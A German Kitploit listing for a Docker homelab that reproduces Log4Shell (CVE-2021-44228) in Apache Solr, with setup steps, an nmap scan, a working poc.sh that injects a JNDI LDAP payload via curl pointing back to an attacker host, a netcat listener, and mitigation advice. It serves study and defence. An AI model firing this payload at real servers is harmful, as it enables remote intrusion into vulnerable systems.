Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
homelab-CVE-2021-44228 — Log4j-Schwachstellen-Homelab | Kitploit
Tools/GitHubGitHub/ricardo354/homelab-cve-2021-44228
Container-SicherheitSchwachstellenanalyseExploitationWebanwendungs-ExploitationLernen & BildungLabs & Praxis
GitHubricardo354/homelab-cve-2021-44228

homelab-CVE-2021-44228

Log4j-Schwachstellen-Homelab

Repository anzeigen
4vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Homelab: Log4Shell (CVE-2021-44228) im Apache Solr

Kontrollierte Docker-Umgebung zur Reproduktion und Untersuchung der Log4Shell-Schwachstelle im Apache Solr.

Die Umgebung

  • Ziel (solr-lab): Apache Solr v8.11.0 (vulhub/solr:8.11.0) mit einer anfälligen Log4j-Version.
  • Angreifer (kali-lab): Einfacher Kali Linux Container mit vorinstallierten nmap, curl und netcat.

Wie man das Lab startet

1. Container initialisieren

Starten Sie die Umgebung im Hintergrund mit:

root@kitploit:~
docker compose up -d --build

2. In Kali (Angreifer-Container) einsteigen

root@kitploit:~
docker compose exec -it kali-lab /bin/bash

3. Internes Netzwerk kartieren

Innerhalb des Kali-Containers finden Sie Ihr eigenes Subnetz und die IP des Apache Solr:

root@kitploit:~
# 1. Sehen Sie Ihre IP und Netzmaske
hostname -I

# 2. Scannen Sie das interne Netzwerk, um die IP des Ziels zu finden (Solr-Port: 8983)
# (Ersetzen Sie das Subnetz unten entsprechend der IP, die Sie im vorherigen Befehl erhalten haben)
nmap -p 8983 172.20.0.0/24

Ausführen der PoC (Proof of Concept)

Das Skript poc.sh injiziert das JNDI-Lookup-Payload in den Parameter der Solr-Administrations-API.

Das Skript (poc.sh)

root@kitploit:~
#!/usr/bin/env bash

if [ "$#" -lt 2 ]; then
    echo "Nutzung: $0 <lhost> <rhost> [lport]"
    echo "Beispiel: $0 172.20.0.3 172.20.0.2 1389"
    exit 1
fi

KALI="$1"
TARGET="$2"
PORT_KALI="${3:-1389}"

echo "[*] Ziel: $TARGET"
echo "[*] Angreifer (LDAP): $KALI auf Port $PORT_KALI"
echo "[*] Exploit auslösen..."

curl -g -v "http://${TARGET}:8983/solr/admin/cores?foo=\${jndi:ldap://${KALI}:${PORT_KALI}/x}"

Ausführung

Noch im Kali, geben Sie dem Skript Ausführungsrechte und führen Sie es mit den korrekten IPs aus:

root@kitploit:~
chmod +x poc.sh
./poc.sh <IP_DO_KALI> <IP_DO_SOLR> 1389

Was passiert hier? Der Solr wird die Anfrage verarbeiten und versuchen, eine LDAP-Verbindung zurück zur Kali-IP auf dem angegebenen Port zu öffnen. Sie können diesen Verbindungsversuch überwachen, indem Sie vor dem Ausführen des Skripts einen schnellen Listener im Kali öffnen (z.B. nc -lnvp 1389).


Mitigation

Um den Fehler in Log4j 2 zu beheben:

  • Aktualisierung: Migrieren Sie die Bibliothek auf sichere Versionen (höher als 2.15.0 oder 2.17.1).
  • JVM Format Msg: Deaktivieren Sie in Versionen zwischen 2.10 und 2.14.1 die Lookups durch Hinzufügen des Flags -Dlog4j2.formatMsgNoLookups=true beim Java-Start.
  • Klassenentfernung: Entfernen Sie manuell die problematische Klasse aus dem Jar, falls Sie nicht aktualisieren können:
root@kitploit:~
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

Tool herunterladen